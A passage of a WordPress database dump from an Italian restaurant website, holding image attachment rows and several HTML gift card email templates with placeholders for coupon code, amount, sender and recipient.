07:39:36','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/eid-1.png',0,'attachment','image/png',0),(450,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','','giftimg-1','','inherit','open','closed','','giftimg-1','','','2017-12-11 10:00:52','2017-12-11 09:00:52','',548,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/giftimg-1.png',0,'attachment','image/png',0),(451,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','','giftimg2-1','','inherit','open','closed','','giftimg2-1','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2017/07/giftimg2-1.png',0,'attachment','image/png',0),(452,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"><div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 20px; text-align: left; background-color: #ffffff; color: #f48643; font-weight: bold; padding-left: 20px; font-size: 20px; font-family: sans-serif;\">[LOGO]</td></tr></tbody></table><table class=\"email-container\" style=\"margin: auto;\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td bgcolor=\"#ffffff\"><span class=\"feature_image\" style=\"display: block; margin: 0px auto; width: 100%;\"> [FEATUREDIMAGE] </span></td></tr><tr><td style=\"background-color: #ffb001; padding: 20px 0;\"></td></tr><tr><td style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: #1976e7; vertical-align: middle; display: table-cell; background: #f27326; padding: 5px;\"><h2 style=\"font-size: 16px; display: block; text-align: center!important; border: 2px dashed #ffffff; padding: 15px 0px; margin: 0px; color: #ffffff;\">COUPON CODE <span style=\"display: block; font-size: 24px; padding: 8px 0 0 0;\">[COUPON]</span> <span style=\"display: block; font-size: 16px; padding: 8px 0 0 0;\">(Ed:[EXPIRYDATE])</span></h2></td></tr><tr><td dir=\"ltr\" style=\"padding: 70px 10px 70px;\" align=\"center\" valign=\"top\" bgcolor=\"#ffb001\" width=\"100%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"stack-column-center\" valign=\"top\" width=\"50%\"><table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"img_width_left_table\" dir=\"ltr\" style=\"padding: 0 10px 0 10px; width: 50%;\" valign=\"top\">[DEFAULTEVENT]</td></tr></tbody></table></td><td class=\"stack-column-center\" valign=\"top\" width=\"50%\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\"><tbody><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #ffffff; padding: 0px 30px 0px 0px; word-wrap: break-word; text-align: left;\" valign=\"top\"><p style=\"color: #ffffff; font-size: 15px; height: auto; min-height: 180px; padding: 0px 0px 20px; text-align: left; word-break: break-word;\">[MESSAGE]</p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; word-wrap: break-word;\" valign=\"top\"><p style=\"margin-bottom: 0px; font-size: 16px; text-align: left;\"><span style=\"display: inline-block; text-align: right; font-size: 15px; vertical-align: top;\">From-</span><span style=\"display: inline-block; text-align: left; font-size: 14px; vertical-align: top; word-break: break-all;\">[FROM]</span></p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; word-wrap: break-word; color: #fff;\" valign=\"top\"><p style=\"margin-top: 0px; font-size: 16px; line-height: 25px; text-align: left;\"><span style=\"display: inline-block; text-align: right; font-size: 15px; vertical-align: top;\">To-</span><span style=\"display: inline-block; text-align: left; font-size: 14px; vertical-align: top; word-break: break-all;\">[TO]</span></p></td></tr><tr><td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; word-wrap: break-word;\" valign=\"top\"><p style=\"text-align: left; font-weight: bold; font-size: 28px;\"><span style=\"color: #dd6e00; margin: 20px 0; vertical-align: top;\">[AMOUNT]/- </span></p></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td bgcolor=\"#f27326\"><table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"padding: 40px; font-family: sans-serif; font-size: 16px; mso-height-rule: exactly; line-height: 20px; color: #fff; text-align: center;\">[DISCLAIMER]</td></tr></tbody></table></td></tr></tbody></table></center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_image > img{width: 100%!important;}</style>','Thanks Giving Day','','publish','closed','closed','','thanks-giving-day-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/thanks-giving-day-2/',0,'giftcard','',0),(453,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\">\r\n<div style=\"display: none; font-size: 1px; line-height: 1px; max-height: 0px; max-width: 0px; opacity: 0; overflow: hidden; mso-hide: all; font-family: sans-serif;\">(Optional) This text will appear in the inbox preview, but not the email body.</div>\r\n<table class=\"email-container\" style=\"margin: auto;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-top: 20px; text-align: left; padding-left: 20px; background-color: #ffffff; color: #3c64ac; font-family: sans-serif; font-weight: bold; font-size: 20px;\">[LOGO]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"email-container\" style=\"margin: auto;\" role=\"presentation\" border=\"0\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#fff\"><span class=\"feature_img\">[FEATUREDIMAGE]</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"background-color: #fff; padding: 20px 0;\"></td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: #1976e7; vertical-align: middle; display: table-cell; background: #ce2a2b; padding: 5px;\">\r\n<h2 style=\"font-size: 16px; text-align: center!important; display: block; color: #ffffff; background: #ce2a2b none repeat scroll 0% 0%; margin: 0px; border: 2px dashed #ffffff; padding: 15px 0px;\">CODICE COUPON<span style=\"display: block; font-size: 24px; padding: 8px 0 0 0;\">[COUPON]</span> <span style=\"display: block; font-size: 16px; padding: 8px 0 0 0;\">(Scadenza:[EXPIRYDATE])</span></h2>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td dir=\"ltr\" style=\"padding: 70px 10px 70px;\" align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" width=\"100%\">\r\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\" width=\"50%\">\r\n<table role=\"presentation\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td dir=\"ltr\" style=\"padding: 0 10px 0 10px;\" valign=\"top\" width=\"50%\">[DEFAULTEVENT]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" valign=\"top\" width=\"50%\">\r\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #000; margin: 0px; word-wrap: break-word; text-align: left;\" valign=\"top\">\r\n<p style=\"color: #000; font-size: 15px; min-height: 180px; height: auto; padding: 0px 0px 20px; margin: 0; text-align: left;\">[MESSAGE]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; word-wrap: break-word; line-height: 20px; color: #000;\" valign=\"top\">\r\n<p style=\"margin-bottom: 0px; font-size: 16px; text-align: left;\"><span style=\"display: inline-block; text-align: right; font-size: 15px; vertical-align: top;\">DA </span><span style=\"display: inline-block; width: 180px; text-align: left; font-size: 14px; word-wrap: break-word; vertical-align: top;\">[FROM]</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; word-wrap: break-word; color: #000;\" valign=\"top\">\r\n<p style=\"margin-top: 0px; font-size: 16px; line-height: 25px; text-align: left;\"><span style=\"display: inline-block; text-align: right; font-size: 15px; vertical-align: top;\">PER </span><span style=\"display: inline-block; width: 180px; text-align: left; font-size: 14px; vertical-align: top;\">[TO]</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td class=\"center-on-narrow\" dir=\"ltr\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; word-wrap: break-word; color: #fff;\" valign=\"top\">\r\n<p style=\"text-align: left; vertical-align: top; font-weight: bold; font-size: 28px;\"><span style=\"color: #c31a1a; margin: 20px 0;\">[AMOUNT]</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td bgcolor=\"#ce2a2b\">\r\n<table role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 40px; font-family: sans-serif; font-size: 16px; mso-height-rule: exactly; line-height: 20px; color: #fff;\">[DISCLAIMER]</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</center><style>@media screen and (max-width: 599px){.email-container{width: 100% !important;margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */.fluid{max-width: 100% !important;height: auto !important;margin-left: auto !important;margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */.stack-column,.stack-column-center{display: block !important;width: 100% !important;max-width: 100% !important;direction: ltr !important;}/* And center justify these ones. */.stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */.center-on-narrow{text-align: center !important;display: block !important;margin-left: auto !important;margin-right: auto !important;float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto; display: block; width:100%;}</style>','Template Gift Card 1','','publish','closed','closed','','president-day-2','','','2017-07-11 09:41:47','2017-07-11 07:41:47','',0,'http://www.ristorantesolymar.it/giftcard/president-day-2/',0,'giftcard','',0),(454,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding-top: 20px; text-align: left; background-color: #092845;color:#ffffff;font-weight:bold;padding-left:20px;font-size:20px;font-family:sans-serif;\">[LOGO]</td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#00203e\"> <span class=\"feature_img\">[FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#ffffff\" valign=\"middle\" style=\"text-align: center; background-position: center center !important; background-size: cover !important;\"><!--[if gte mso 9]><v:rect xmlns:v=\"urn:schemas-microsoft-com:vml\" fill=\"true\" stroke=\"false\" style=\"width:600px;height:175px; background-position: center center !important;\"><v:fill type=\"tile\" src=\"http://placehold.it/600x230/222222/666666\" color=\"#222222\"/><v:textbox inset=\"0,0,0,0\"><![endif]--><div> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td valign=\"middle\" style=\"text-align: center; padding: 8px; font-family: sans-serif;mso-height-rule: exactly; line-height: 20px; color: rgb(54,79,103);\"> <h1 style=\"border:2px dashed #14314d; text-align:center!important; padding:33px; margin:0;font-size:15px;\">COUPON <span style=\"display: block; padding: 15px 0;font-size:25px;\">[COUPON]</span><span style=\"display: block;font-size:15px;\">[EXPIRYDATE]</span></h1> </td></tr></table></div><!--[if gte mso 9]></v:textbox></v:rect><![endif]--></td></tr><tr> <td bgcolor=#00203e dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding: 70px 0;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <td class=\"stack-column-center\" style=\"vertical-align: top; width: 100%; float:left;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding:0 15px; width:50%;\"> [DEFAULTEVENT] </td></tr></table> </td><td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%; \"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; min-height:180px;height:auto;padding:0 15px; word-wrap:break-word;\" class=\"center-on-narrow\"> <p style=\"text-align:left;font-size:16px;padding:0 0 20px 0; min-height:150px;word-break: break-word;\" > [MESSAGE] </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" class=\"center-on-narrow\"> <p style=\"margin-bottom:0px;font-size:16px;text-align: left;\"> <span style=\"display: inline-block; text-align:right;font-size:15px;vertical-align:top;\">From-</span> <span style=\"display: inline-block;text-align:left;font-size:14px;vertical-align:top;word-break: break-all;\"> [FROM]</span> </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"margin-top:0px;font-size:16px;line-height:25px;text-align: left;\"> <span style=\"display: inline-block; text-align: right;font-size:15px; word-wrap: break-word; vertical-align:top;\">To-</span> <span style=\"display: inline-block; vertical-align:top; width: 180px;text-align:left;font-size:14px; word-break: break-all;\"> [TO]</span> </p></td></tr><td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;padding:5px 10px;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"text-align:left;font-weight:bold;font-size:30px;margin:10px 0; vertical-align:top;\"> <span style=\"color:#fff; \"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\"></span>[AMOUNT]</span>/-</span> </p></td></tr></table> </td></tr></table> <tr > <td bgcolor=\"#fff\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #074da4; font-size:16px; background: #03192d;\"> [DISCLAIMER] </td></tr></table> </td></tr></table> </center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_image > img{width: 100%!important;}</style>','Halloween','','publish','closed','closed','','halloween-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/halloween-2/',0,'giftcard','',0),(455,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','  <center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"><tr><td style=\"padding-top: 20px; text-align: left; background-color: #074da4;color:#ffffff;font-weight:bold;padding-left:20px;font-size:20px;font-family:sans-serif;\">[LOGO]</td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\" align=\"center\"> <td bgcolor=\"#074da4\"> <span class=\"feature_img\"> [FEATUREDIMAGE]</span> </td></tr><tr> <td bgcolor=\"#fff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; color: rgb(25, 118, 231); vertical-align: middle; display: table-cell; background: rgb(25, 118, 231) none repeat scroll 0% 0%; padding: 20px 0px;\"> <span style=\"display: block; border-top: 3px dashed #fff; padding: 5px;\"></span> <h2 style=\"vertical-align: middle; text-align:center!important; font-size: 16px; display: block; color: rgb(25, 118, 231); background: rgb(255, 255, 255) none repeat scroll 0% 0%; padding: 15px 0px;\">COUPON CODE <span style=\"display:block; font-size:24px; padding:8px 0 0 0;\">[COUPON]</span> <span style=\"display:block;font-size:16px; padding:8px 0 0 0;\">(Ed:[EXPIRYDATE])</span></h2> <span style=\"display: block; border-bottom: 3px dashed #fff; padding: 5px;\"></span> </td></tr><tr > <td bgcolor=\"#1f81fa\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" > <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr > <td width=\"50%\" valign=\"top\" class=\"stack-column-center\" style=\"padding: 50px 0px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr > <td dir=\"ltr\" valign=\"top\" style=\"padding: 0 30px 0 30px; width: 50%;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" valign=\"top\" class=\"stack-column-center\" style=\"padding: 50px 0px;text-align:left;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; min-height:170px;height:auto; word-wrap:break-word; \" class=\"center-on-narrow\"> <p style=\"word-spacing: 1px;text-align:left;font-size:16px; min-height: 150px;\"> [MESSAGE] </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" class=\"center-on-narrow\"> <p style=\"margin-bottom:0px;font-size:16px;text-align: left;\"> <span style=\"display: inline-block; text-align:right;font-size:15px; vertical-align:top;\">From-</span> <span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; vertical-align:top;\"> [FROM]</span> </p></td></tr><tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;word-wrap: break-word; \" class=\"center-on-narrow\"> <p style=\"margin-top:0px;font-size:16px;line-height:25px;text-align: left;\"> <span style=\"display: inline-block; text-align: right;font-size:15px; vertical-align:top;\">To-</span> <span style=\"display: inline-block;width: 180px;text-align:left;font-size:14px; vertical-align:top;\"> [TO]</span> </p></td></tr><td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif;font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff;padding:5px 10px;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"text-align:left;font-weight:bold;font-size:28px; vertical-align:top;\"> <span style=\"color:#fff; margin:20px 0;\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\"></span>[AMOUNT]</span>/-</span> </p></td></tr></table> </td></tr></table> </td></tr><tr > <td bgcolor=\"#074da4\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\"padding: 40px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #fff; font-size:16px; text-align: center;\"> [DISCLAIMER] </td></tr></table> </td></tr></table> </center><style>/* Media Queries */ @media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}@media screen and (max-width: 599px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}.feature_img > img{margin: 0 auto; display: block;}</style>','Easter','','publish','closed','closed','','easter-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/easter-2/',0,'giftcard','',0),(456,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table class=\"email-container\" role=\"presentation\" style=\"margin: auto;\" width=\"600\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tbody> <tr> <td style=\"text-align: center; background-color: #000000;\"> <p style=\"height: auto; background: #000000; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555; font-size: 27.79px; text-transform: uppercase; color: #ffffff; font-weight: bold;\" width=\"200\" border=\"0\" height=\"50\">[LOGO]</p></td></tr></tbody> </table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#000000\"> <span class=\"feature_img\">[FEATUREDIMAGE] </span> </td></tr><tr style=\"margin-top: 20px;\"> <td bgcolor=\"#c31a1a\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #555555;\"> <h1 style=\"color: #ffffff; padding: 33px; margin: 10px; border: 2px dashed #ffffff; text-transform: uppercase; font-size: 15px; font-weight: 200; line-height: 27px; text-align:center!important;\">Coupon<span style=\"display:block; font-size:25px; padding:5px 0;\">[COUPON]</span><span style=\"display:block;\">(Ed:[EXPIRYDATE])</span></h1> </td></tr><tr> <td background=\"http://placehold.it/600x230/222222/666666\" bgcolor=\"#222222\" valign=\"middle\" style=\"text-align: center; background-position: center center !important; background-size: cover !important;\"><!--[if gte mso 9]> <v:rect xmlns:v=\"urn:schemas-microsoft-com:vml\" fill=\"true\" stroke=\"false\" style=\"width:600px;height:175px; background-position: center center !important;\"> <v:fill type=\"tile\" src=\"http://placehold.it/600x230/222222/666666\" color=\"#222222\"/> <v:textbox inset=\"0,0,0,0\"><![endif]--><!--[if gte mso 9]> </v:textbox> </v:rect><![endif]--> </td></tr><tr> <td bgcolor=\"#000000\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding: 30px 10px; text-align: center;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"padding: 0 14px; height: 202px; width: 50%;\"> [DEFAULTEVENT] </td></tr></table> </td><td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td dir=\"ltr\" valign=\"top\" style=\"font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; padding: 0px 10px; text-align: left;margin: 0 auto;word-wrap: break-word;\" class=\"center-on-narrow\"> <p style=\"font-size: 14.97px; letter-spacing: 0px; text-align:left; height:auto; min-height: 159px; margin: 0px;\">[MESSAGE]</p><p style=\"font-size: 14.97px; letter-spacing: 0px; text-align:justify;margin: 0px;\"><span style=\"display: inline-block; text-align: right; vertical-align:top;\">From:</span><span style=\"display: inline-block; text-align: left; width: 180px; vertical-align:top;\">[FROM]</span></p><p style=\"text-align: left;\"> To:</span><span\">[TO]</span></p><strong style=\"color:#c31a1a; font-size: 23.96px; display: block; padding-top: 10px; vertical-align:top; text-align: left;\">[AMOUNT]/-</strong> <br><br></td></tr></table> </td></tr></table> </td></tr><tr> <td style=\"font-size: 0; line-height: 0;\"> &nbsp; </td></tr><tr> <td bgcolor=\"#c31a1a\"> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" width=\"100%\"> <tr> <td style=\" padding:36px 28px; font-family: sans-serif; font-size: 15px; mso-height-rule: exactly; line-height: 20px; color: #ffffff; text-align: center;\"> [DISCLAIMER] </td></tr></table> </td></tr></table> </center><style>@media screen and (max-width: 600px){.email-container{width: 100% !important; margin: auto !important;}/* What it does: Forces elements to resize to the full width of their container. Useful for resizing images beyond their max-width. */ .fluid{max-width: 100% !important; height: auto !important; margin-left: auto !important; margin-right: auto !important;}/* What it does: Forces table cells into full-width rows. */ /* And center justify these ones. */ .stack-column-center{text-align: center !important;}/* What it does: Generic utility class for centering. Useful for images, buttons, and nested tables. */ .center-on-narrow{text-align: center !important; display: block !important; margin-left: auto !important; margin-right: auto !important; float: none !important;}table.center-on-narrow{display: inline-block !important;}}@media screen and (max-width:460px){.stack-column, .stack-column-center{display: block !important; width: 100% !important; max-width: 100% !important; direction: ltr !important;}}</style>','Fathers Day','','publish','closed','closed','','fathers-day-2','','','2017-07-11 09:39:37','2017-07-11 07:39:37','',0,'http://www.ristorantesolymar.it/giftcard/fathers-day-2/',0,'giftcard','',0),(457,1,'2017-07-11 09:39:37','2017-07-11 07:39:37','<center style=\"width: 100%;\"> <div style=\"display:none;font-size:1px;line-height:1px;max-height:0px;max-width:0px;opacity:0;overflow:hidden;mso-hide:all;font-family: sans-serif;\"> (Optional) This text will appear in the inbox preview, but not the email body. </div><table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td style=\"padding: 0px 0px 20px; text-align: center; background: #fff0cd \"> <p style=\"color:#80150b; font-size: 25px; font-family: sans-serif; margin: 0px;\"><strong>[LOGO] </strong></p></td></tr></table> <table role=\"presentation\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\" width=\"600\" style=\"margin: auto;\" class=\"email-container\"> <tr> <td bgcolor=\"#fff0cd\"> <span class=\"feature_img\"> [FEATUREDIMAGE] </span> </td></tr><tr> <td bgcolor=\"#fff0cd\" style=\"padding: 50px 0px 30px; text-align: center; font-family: sans-serif; font-size: 14.97px; mso-height-rule: exactly; line-height: 9px; color: #555555;\"> <p style=\"background: #ffe7b1; border: 8px solid #ffd064; color: #80150b; font-size:15px; padding: 33px 0; text-transform: uppercase; margin: 0; line-height:29px; text-align:center!important;\">Coupon Code<span style=\"display:block; font-size:25px;\">[COUPON]</span> <span style=\"display:block; font-size:15px;\">(Ed:[EXPIRYDATE])</span></p><br><br></td></tr><tr> <td bgcolor=\"#fff0cd\" dir=\"ltr\" align=\"center\" valign=\"top\" width=\"100%\" style=\"padding-bottom: 44px;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"> <tr> <td width=\"50%\" class=\"stack-column-center\" style=\"vertical-align:top;\"> <table role=\"presentation\" align=\"center\" border=\"0\" cellpadding=\"0\" 